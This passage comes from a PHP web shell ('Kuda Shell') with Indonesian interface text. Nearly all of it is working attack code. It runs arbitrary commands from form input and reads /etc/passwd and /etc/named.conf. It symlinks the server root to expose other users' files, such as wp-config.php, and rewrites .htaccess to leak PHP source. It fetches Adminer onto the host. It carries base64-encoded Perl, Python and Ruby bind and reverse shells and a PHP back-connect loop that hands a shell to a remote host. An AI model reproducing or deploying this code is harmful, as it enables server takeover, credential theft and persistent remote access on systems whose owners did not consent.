  1396. while (list ($key, $val) = each($ara)){
  1397. print "$val:";
  1398. }
  1399. print "n";
  1400. }
  1401. }
  1402. echo"</textarea><br/>";
  1403. }
  1404.  
  1405. if ($_POST['awkuser']) {
  1406. echo"<textarea class='form-control' rows='13'>
  1407. ".shell_exec("awk -F: '{ print $1 }' $paswd | sort")."
  1408. </textarea><br/>";
  1409. }
  1410. if ($_POST['systuser']) {
  1411. echo"<textarea class='form-control' rows='13'>";
  1412. echo system("$mail");
  1413. echo "</textarea><br>";
  1414. }
  1415. if ($_POST['passthuser']) {
  1416. echo"<textarea class='form-control' rows='13'>";
  1417. echo passthru("$mail");
  1418. echo "</textarea><br>";
  1419. }
  1420. if ($_POST['exuser']) {
  1421. echo"<textarea class='form-control' rows='13'>";
  1422. echo exec("$mail");
  1423. echo "</textarea><br>";
  1424. }
  1425. if ($_POST['shexuser']) {
  1426. echo"<textarea class='form-control' rows='13'>";
  1427. echo shell_exec("$mail");
  1428. echo "</textarea><br>";
  1429. }
  1430. echo "</div>";
  1431. exit;
  1432. }
  1433.  
  1434.  
  1435. /*
  1436. Adminer
  1437. */
  1438. if($_GET['aksi'] == 'adminer') {
  1439. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1440. function adminer($url, $isi) {
  1441. $fp = fopen($isi, "w");
  1442. $ch = curl_init();
  1443. curl_setopt($ch, CURLOPT_URL, $url);
  1444. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1445. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1446. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1447. curl_setopt($ch, CURLOPT_FILE, $fp);
  1448. return curl_exec($ch);
  1449. curl_close($ch);
  1450. fclose($fp);
  1451. ob_flush();
  1452. flush();
  1453. }
  1454. if(file_exists('adminer.php')) {
  1455. echo "<a href='$full/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
  1456. } else {
  1457. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1458. echo "<p class='text-center'>Berhasil Membuat Adminer</p><a href='$full/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
  1459. } else {
  1460. echo "<p class='text-center text-danger'>Gagal Membuat Adminer</p>";
  1461. }
  1462. }
  1463. exit;
  1464. }
  1465.  
  1466.  
  1467. /*
  1468. * Symlink Server
  1469. * Kuda Shell
  1470. */
  1471. if($_GET['aksi'] == 'symlink') {
  1472. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1473. $d0mains = @file("/etc/named.conf");
  1474. if(!$d0mains) {
  1475. die ("[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]<br/><font color='red'>Error tidak dapat membaca /etc/named.conf</font><br/><br/>");
  1476. }
  1477. ##htaccess
  1478. if($d0mains){
  1479. @mkdir("indosec_sym",0777);
  1480. @chdir("indosec_sym");
  1481. @exe("ln -s / root");
  1482. $file3 = 'Options Indexes FollowSymLinks
  1483. DirectoryIndex indsc.html
  1484. AddType text/plain php html php5 phtml
  1485. AddHandler text/plain php html php5 phtml
  1486. Satisfy Any';
  1487. $fp3 = fopen('.htaccess','w');
  1488. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1489. echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
  1490. <div class='tmp'>
  1491. <table class='text-center table-responsive'>
  1492. <thead class='bg-info'>
  1493. <th>No.</th>
  1494. <th>Domains</th>
  1495. <th>Users</th>
  1496. <th>symlink </th>
  1497. </thead>";
  1498. $dcount = 1;
  1499. foreach($d0mains as $d0main){
  1500. if(eregi("zone",$d0main)){
  1501. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1502. flush();
  1503. if(strlen(trim($domains[1][0])) > 2){
  1504. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1505. echo "<tr>
  1506. <td>".$dcount."</td>
  1507. <td class='text-left'><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td>
  1508. <td>".$user['name']."</td>
  1509. <td><a href='$full/indosec_sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a></td>
  1510. </tr>";
  1511. flush();
  1512. $dcount++;
  1513. }
  1514. }
  1515. }
  1516. echo "</table></div>";
  1517. }else{
  1518. $TEST = @file('/etc/passwd');
  1519. if ($TEST){
  1520. @mkdir("indosec_sym",0777);
  1521. @chdir("indosec_sym");
  1522. @exe("ln -s / root");
  1523. $file3 = 'Options Indexes FollowSymLinks
  1524. DirectoryIndex indsc.html
  1525. AddType text/plain php html php5 phtml
  1526. AddHandler text/plain php html php5 phtml
  1527. Satisfy Any';
  1528. $fp3 = fopen('.htaccess','w');
  1529. $fw3 = fwrite($fp3,$file3);
  1530. @fclose($fp3);
  1531. echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
  1532. <div class='tmp'>
  1533. <table class='text-center table-responsive'>
  1534. <thead class='bg-warning'>
  1535. <th>No.</th>
  1536. <th>Users</th>
  1537. <th>symlink </th>
  1538. </thead>";
  1539. $dcount = 1;
  1540. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1541. while(!feof($file)){
  1542. $s = fgets($file);
  1543. $matches = array();
  1544. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1545. $matches = str_replace("home/","",$matches[1]);
  1546. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1547. continue;
  1548. echo "<tr>
  1549. <td>".$dcount."</td>
  1550. <td>".$matches."</td>
  1551. <td><a href=$full/indosec_sym/root/home/".$matches."/public_html target='_blank'>Symlink</a></td>
  1552. </tr>";
  1553. $dcount++;
  1554. }
  1555. fclose($file);
  1556. echo "</table></div>";
  1557. }else{
  1558. if($os != "Windows"){
  1559. @mkdir("indosec_sym",0777);
  1560. @chdir("indosec_sym");
  1561. @exe("ln -s / root");
  1562. $file3 = 'Options Indexes FollowSymLinks
  1563. DirectoryIndex indsc.html
  1564. AddType text/plain php html php5 phtml
  1565. AddHandler text/plain php html php5 phtml
  1566. Satisfy Any';
  1567. $fp3 = fopen('.htaccess','w');
  1568. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1569. echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
  1570. <div class='tmp'>
  1571. <table class='text-center table-responsive'>
  1572. <thead class='bg-danger'>
  1573. <th>ID.</th>
  1574. <th>Users</th>
  1575. <th>symlink </th>
  1576. </thead>";
  1577. $temp = "";$val1 = 0;$val2 = 1000;
  1578. for(;$val1 <= $val2;$val1++){
  1579. $uid = @posix_getpwuid($val1);
  1580. if ($uid)$temp .= join(':',$uid)."\n";
  1581. }
  1582. echo '<br/>';$temp = trim($temp);
  1583. $file5 = fopen("test.txt","w");
  1584. fputs($file5,$temp);
  1585. fclose($file5);$dcount = 1;$file =
  1586. fopen("test.txt", "r") or exit("Unable to open file!");
  1587. while(!feof($file)){
  1588. $s = fgets($file);$matches = array();
  1589. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1590. $matches = str_replace("home/","",$matches[1]);
  1591. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1592. continue;
  1593. echo "<tr>
  1594. <td>".$dcount."</td>
  1595. <td>".$matches."</td>
  1596. <td><a href=$full/indosec_sym/root/home/".$matches."/public_html target='_blank'>Symlink</a></td>
  1597. </tr>";
  1598. $dcount++;
  1599. }
  1600. fclose($file);
  1601. echo "</table></div>";
  1602. unlink("test.txt");
  1603. }
  1604. }
  1605. }
  1606. exit;
  1607. }
  1608.  
  1609. if($_GET['aksi'] == 'symread') {
  1610. echo "read /etc/named.conf";
  1611. echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
  1612. <textarea class='form-control' rows='13' name='file'>";
  1613. flush();
  1614. flush();
  1615. $file = '/etc/named.conf';
  1616. $r3ad = @fopen($file, 'r');
  1617. if ($r3ad){
  1618. $content = @fread($r3ad, @filesize($file));
  1619. echo "".htmlentities($content)."";
  1620. }else if (!$r3ad) {
  1621. $r3ad = @show_source($file) ;
  1622. }else if (!$r3ad) {
  1623. $r3ad = @highlight_file($file);
  1624. }else if (!$r3ad) {
  1625. $sm = @symlink($file,'sym.txt');
  1626. if ($sm){
  1627. $r3ad = @fopen('sym/sym.txt', 'r');
  1628. $content = @fread($r3ad, @filesize($file));
  1629. echo "".htmlentities($content)."";
  1630. }
  1631. }
  1632. echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
  1633. if(isset($_GET['save'])){
  1634. $cont = stripcslashes($_POST['file']);
  1635. $f = fopen('named.txt','w');
  1636. $w = fwrite($f,$cont);
  1637. if($w){
  1638. echo '<br/>save has been successfully';
  1639. }
  1640. fclose($f);
  1641. }
  1642. exit;
  1643. }
  1644.  
  1645. if ($_GET['aksi'] == 'sym_404'){
  1646. $cp = get_current_user();
  1647. if($_POST['execute']){
  1648. @rmdir("indosec_sym404");
  1649. @mkdir("indosec_sym404", 0777);
  1650. $dir = $_POST['dir'];
  1651. $isi = $_POST['isi'];
  1652. @system("ln -s ".$dir."indosec_sym404/".$isi);
  1653. @symlink($dir,"indosec_sym404/".$isi);
  1654. $inija = fopen("indosec_sym404/.htaccess", "w");
  1655. @fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain php html php5 phtml\nAddHandler text/plain php html php5 phtml\nSatisfy Any");
  1656. echo'<a href="/indosec_sym404/" target="_blank" class="btn btn-success btn-block mb-3">Click Me!!</a>';
  1657. }else{
  1658. echo '<h2>Symlink 404</h2>
  1659. <form method="post">
  1660. File Target: <input type="text" class="form-control" name="dir" value="/home/'.$cp.'/public_html/wp-config.php"><br/>
  1661. Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
  1662. <input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
  1663. <p class="text-muted">NB: Letak wp-config tidak semuanya berada di <u>public_html/wp-config.php</u> jadi silahkan ubah sesuai letaknya.</p>
  1664. </form>';
  1665. }
  1666. exit;
  1667. }
  1668.  
  1669.  
  1670. if ($_GET['aksi'] == 'sym_bypas'){
  1671. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1672. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  1673. $u = explode("/",$pageFTP );
  1674. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
  1675. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  1676. $cont = stripcslashes($_POST['file']);
  1677. if(!file_exists('passwd.txt')){
  1678. $f = @fopen('passwd.txt','w');
  1679. $w = @fwrite($f,$cont);
  1680. fclose($f);
  1681. }
  1682. if($w or @filesize('passwd.txt') > 0){
  1683. echo "<div class='tmp'>
  1684. <table width='100%' class='text-center table-responsive mb-4'>
  1685. <thead class='bg-info'>
  1686. <th>Users</th>
  1687. <th>symlink</th>
  1688. <th>FTP</th>
  1689. </thead>";
  1690. flush();
  1691. $fil3 = file('passwd.txt');
  1692. foreach ($fil3 as $f){
  1693. $u=explode(':', $f);
  1694. $user = $u['0'];
  1695. echo "<tr>
  1696. <td class='text-left pl-1'>$user</td>
  1697. <td>
  1698. <a href='$full/sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  1699. </td>
  1700. <td>
  1701. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  1702. </td>
  1703. </tr>";
  1704. flush();
  1705. flush();
  1706. }
  1707. echo "</tr></table></div>";
  1708. die();
  1709. }
  1710.  
  1711. }
  1712.  
  1713. echo "read /etc/passwd <font color='red'>error ? </font><a href='?dir=".$dir."&aksi=passwbypass'>Bypass Here</a>
  1714. <form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
  1715. <textarea class='form-control' rows='13' name='file'>";
  1716. flush();
  1717. $file = '/etc/passwd';
  1718. $r3ad = @fopen($file, 'r');
  1719. if ($r3ad){
  1720. $content = @fread($r3ad, @filesize($file));
  1721. echo "".htmlentities($content)."";
  1722. }elseif(!$r3ad) {
  1723. $r3ad = @show_source($file) ;
  1724. }elseif(!$r3ad) {
  1725. $r3ad = @highlight_file($file);
  1726. }elseif(!$r3ad) {
  1727.  
  1728. for($uid=0;$uid<1000;$uid++){
  1729. $ara = posix_getpwuid($uid);
  1730. if (!empty($ara)) {
  1731. while (list ($key, $val) = each($ara)){
  1732. print "$val:";
  1733. }
  1734. print "\n";
  1735. }
  1736. }
  1737. }
  1738. flush();
  1739. echo "</textarea><br/>
  1740. <input type='submit' class='btn btn-danger btn-block' value='Symlink'/>
  1741. </form>";
  1742. flush();
  1743. exit;
  1744. }
  1745.  
  1746.  
  1747. /*
  1748. * Back Connect
  1749. * Kuda Shell
  1750. */
  1751. if($_GET['aksi'] == 'bctools'){
  1752. echo "<h4 class='text-center mb-4'>Back Connect Tools</h4>
  1753. <form method='post'>
  1754. <div class='row'>
  1755. <div class='col-md-10'>
  1756. <span>Bind port to /bin/sh [Perl]</span><br/>
  1757. <label>Port :</label>
  1758. <div class='form-group input-group mb-4'>
  1759. <input type='text' name='port' class='form-control' value='6969'>
  1760. <input type='submit' name='bpl' class='btn btn-danger form-control' value='Reserve'>
  1761. </div>
  1762. <h5>Back-Connect</h5>
  1763. <label>Server :</label>
  1764. <input type='text' name='server' class='form-control mb-3' placeholder='". $_SERVER['REMOTE_ADDR'] ."'>
  1765. <label>Port :</label>
  1766. <div class='form-group input-group mb-4'>
  1767. <input type='text' name='port' class='form-control' placeholder='443'>
  1768. <select class='form-control' name='backconnect'>
  1769. <option value='perl'>Perl</option>
  1770. <option value='php'>PHP</option>
  1771. <option value='python'>Python</option>
  1772. <option value='ruby'>Ruby</option>
  1773. </select>
  1774. </div>
  1775. <input type='submit' class='btn btn-danger btn-block' value='Connect'>
  1776. </div>
  1777. </div>
  1778. </form>";
  1779.  
  1780. if($_POST['bpl']) {
  1781. $bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
  1782. $brt = @fopen('bp.pl','w');
  1783. fwrite($brt,$bp);
  1784. $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
  1785. sleep(1);
  1786. echo "<pre class='text-light'>$out\n".exe("ps aux | grep bp.pl")."</pre>";
  1787. unlink("bp.pl");
  1788. }
  1789. if($_POST['backconnect'] == 'perl') {
  1790. $bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
  1791. $plbc = @fopen('bc.pl','w');
  1792. fwrite($plbc,$bc);
  1793. $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
  1794. sleep(1);
  1795. echo "<pre class='text-light'>$out\n".exe("ps aux | grep bc.pl")."</pre>";
  1796. unlink("bc.pl");
  1797. }
  1798. if($_POST['backconnect'] == 'python') {
  1799. $becaa = base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");
  1800. $pbcaa = @fopen('bcpyt.py','w');
  1801. fwrite($pbcaa,$becaa);
  1802. $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
  1803. sleep(1);
  1804. echo "<pre class='text-light'>$out1\n".exe("ps aux | grep bcpyt.py")."</pre>";
  1805. unlink("bcpyt.py");
  1806. }
  1807. if($_POST['backconnect'] == 'ruby') {
  1808. $becaak = base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
  1809. $pbcaak = @fopen('bcruby.rb','w');
  1810. fwrite($pbcaak,$becaak);
  1811. $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
  1812. sleep(1);
  1813. echo "<pre class='text-light'>$out2\n".exe("ps aux | grep bcruby.rb")."</pre>";
  1814. unlink("bcruby.rb");
  1815. }
  1816. if($_POST['backconnect'] == 'php') {
  1817. $ip = $_POST['server'];
  1818. $port = $_POST['port'];
  1819. $sockfd = fsockopen($ip , $port , $errno, $errstr );
  1820. if($errno != 0){
  1821. echo "<font color='red'>$errno : $errstr</font>";
  1822. } else if (!$sockfd){
  1823. $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  1824. } else {
  1825. fputs ($sockfd ,"
  1826. \n{#######################################}
  1827. \n..:: BackConnect PHP By Con7ext ::..
  1828. \n{#######################################}\n");
  1829. $dir = @shell_exec("pwd");
  1830. $sysinfo = @shell_exec("uname -a");
  1831. $time = @Shell_exec("time");
  1832. $len = 1337;
  1833. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  1834. while(!feof($sockfd)){
  1835. $cmdPrompt = '[kuda]#:> ';
  1836. @fputs ($sockfd , $cmdPrompt );
  1837. $command= fgets($sockfd, $len);
  1838. @fputs($sockfd , "\n" . @shell_exec($command) . "\n\n");
  1839. }
